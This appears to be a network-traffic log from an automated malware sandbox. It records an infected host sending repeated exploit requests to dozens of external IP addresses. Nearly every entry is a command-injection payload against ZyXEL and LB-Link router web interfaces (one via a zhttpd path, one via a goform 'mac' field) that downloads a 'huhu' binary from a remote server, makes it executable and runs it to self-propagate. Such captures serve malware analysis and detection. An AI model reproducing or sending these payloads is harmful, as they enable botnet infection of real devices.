                                                Jan 29, 2024 07:08:02.641381025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8091192.168.2.2342758173.147.230.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641429901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8092192.168.2.2356796164.118.168.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641491890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8093192.168.2.2349840180.4.110.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641526937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8094192.168.2.235864294.182.42.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641572952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8095192.168.2.2348894146.164.24.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641598940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8096192.168.2.235159298.12.183.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641627073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8097192.168.2.233814852.244.152.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641689062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8098192.168.2.233377820.162.42.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641706944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8099192.168.2.2346508155.164.98.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641735077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8100192.168.2.2353232175.76.34.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.641774893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8101192.168.2.2352526147.71.241.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.645437956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8102192.168.2.235895277.132.212.2168080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:02.779938936 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:03.399647951 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:04.647496939 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:07.271116972 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8103192.168.2.23340948.24.56.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.653800964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8104192.168.2.234800894.30.140.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.653830051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8105192.168.2.2347724139.95.210.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.653894901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8106192.168.2.2344692100.227.135.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.653920889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8107192.168.2.234457654.197.135.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.653968096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8108192.168.2.233468452.118.112.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654011965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8109192.168.2.2351602192.144.7.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654073954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8110192.168.2.233600496.228.136.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654115915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8111192.168.2.2356994199.109.11.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654156923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8112192.168.2.2344962196.116.51.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654195070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8113192.168.2.235317481.132.46.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654246092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8114192.168.2.234756454.26.47.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654279947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8115192.168.2.2333324218.17.32.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654319048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8116192.168.2.2358848110.126.215.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654376030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8117192.168.2.233928896.67.220.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654403925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8118192.168.2.235241854.33.50.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654459000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8119192.168.2.234024663.89.116.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654496908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8120192.168.2.2360122169.132.247.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654521942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8121192.168.2.235364474.147.226.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654563904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8122192.168.2.2339856155.51.31.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654606104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8123192.168.2.2350040189.221.101.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654656887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8124192.168.2.2335252168.110.93.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654690981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8125192.168.2.2350730221.209.160.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654750109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8126192.168.2.2347602202.154.212.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654798985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8127192.168.2.2336312178.108.46.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654833078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8128192.168.2.2333148137.3.151.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654861927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8129192.168.2.2340776101.247.56.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654906988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8130192.168.2.2345742187.46.186.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654936075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8131192.168.2.235229658.13.200.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.654969931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8132192.168.2.234940447.189.229.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655002117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8133192.168.2.2343264173.28.102.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655047894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8134192.168.2.2345790107.61.28.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655076981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8135192.168.2.2355152108.231.251.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655133963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8136192.168.2.236037674.156.108.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655169964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8137192.168.2.234511244.184.12.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655188084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8138192.168.2.235799840.129.174.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655261993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8139192.168.2.235147450.65.171.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655296087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8140192.168.2.2335140220.238.236.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655332088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8141192.168.2.235459097.55.32.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655381918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8142192.168.2.2332978208.216.247.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655417919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8143192.168.2.233950293.90.115.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655436993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8144192.168.2.2336420188.232.186.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:03.655461073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8145192.168.2.235573858.199.108.185443
                                                TimestampBytes transferredDirectionData
